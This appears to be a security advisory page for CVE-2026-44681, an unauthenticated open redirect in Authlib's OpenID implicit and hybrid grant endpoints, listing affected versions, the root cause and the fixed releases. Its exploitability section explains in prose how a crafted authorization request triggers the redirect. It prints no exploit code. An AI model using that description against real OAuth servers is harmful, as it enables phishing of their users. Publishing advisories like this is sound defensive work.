CVE-2026-44681
Open Redirect vulnerability in authlib (PyPI)

Open Redirect No known exploit

What is CVE-2026-44681 About?

This vulnerability in Authlib's `OpenIDImplicitGrant` and `OpenIDHybridGrant` authorization endpoints allows an unauthenticated open redirect. By omitting the `openid` scope in an authorization request, an attacker can cause the authorization server to issue a 302 redirect to an attacker-chosen URL. This is a client-side vulnerability that primarily enables phishing attacks by leveraging the trusted domain of the OIDC provider.

Affected Software

  • authlib
    • >=1.7.0, <1.7.1
    • <1.6.12

Technical Details

Authlib's OpenIDImplicitGrant and OpenIDHybridGrant authorization endpoints are vulnerable to an unauthenticated open redirect. The core issue lies in the validation order: these methods perform the openid scope presence check before validating the redirect_uri against the client's registered URIs. If an authorization request omits the openid scope, an InvalidScopeError is thrown, which carries the attacker-controlled self.request.payload.redirect_uri. The OAuth2Error.__call__ method then interprets any error with a non-empty redirect_uri as a prompt to issue an HTTP 302 redirect to that unsanitized URI. This allows an unauthenticated attacker to supply an arbitrary redirect_uri in a malformed request (using specific response_type values and omitting the openid scope), causing the trusted authorization server to redirect a victim's browser to an attacker-chosen URL. This bypasses the critical AuthorizationEndpointMixin.validate_authorization_redirect_uri check that normally prevents such redirects.

What is the Impact of CVE-2026-44681?

Successful exploitation may allow attackers to conduct phishing campaigns by redirecting victims from a trusted authorization server domain to an attacker-controlled URL, lending credibility to the malicious site.

What is the Exploitability of CVE-2026-44681?

Exploitation is relatively easy and requires no authentication, valid session, or even a valid client_id. An attacker only needs to send a crafted GET request to the /oauth/authorize endpoint with a response_type matching OpenIDImplicitGrant or OpenIDHybridGrant (e.g., id_token or code id_token), a scope that does not contain openid, and an arbitrary redirect_uri. This is a remote, unauthenticated vulnerability. The absence of openid in the scope triggers the early error path, which then uses the unvalidated redirect_uri for redirection. The simplicity of the crafted request and the lack of prerequisites make this vulnerability a high risk for phishing attacks.

What are the Known Public Exploits?

PoC Author Link Commentary
No known exploits

What are the Available Fixes for CVE-2026-44681?

Available Upgrade Options

  • authlib
    • <1.6.12 → Upgrade to 1.6.12
  • authlib
    • >=1.7.0, <1.7.1 → Upgrade to 1.7.1

Struggling with dependency upgrades?

See how Resolved Security's drop-in replacements make it simple.

Book a demo

Additional Resources

What are Similar Vulnerabilities to CVE-2026-44681?

Similar Vulnerabilities: CVE-2021-29505 , CVE-2020-15167 , CVE-2019-15891 , CVE-2018-1000635 , CVE-2017-1000486

All Rights reserved 2025
Privacy Policy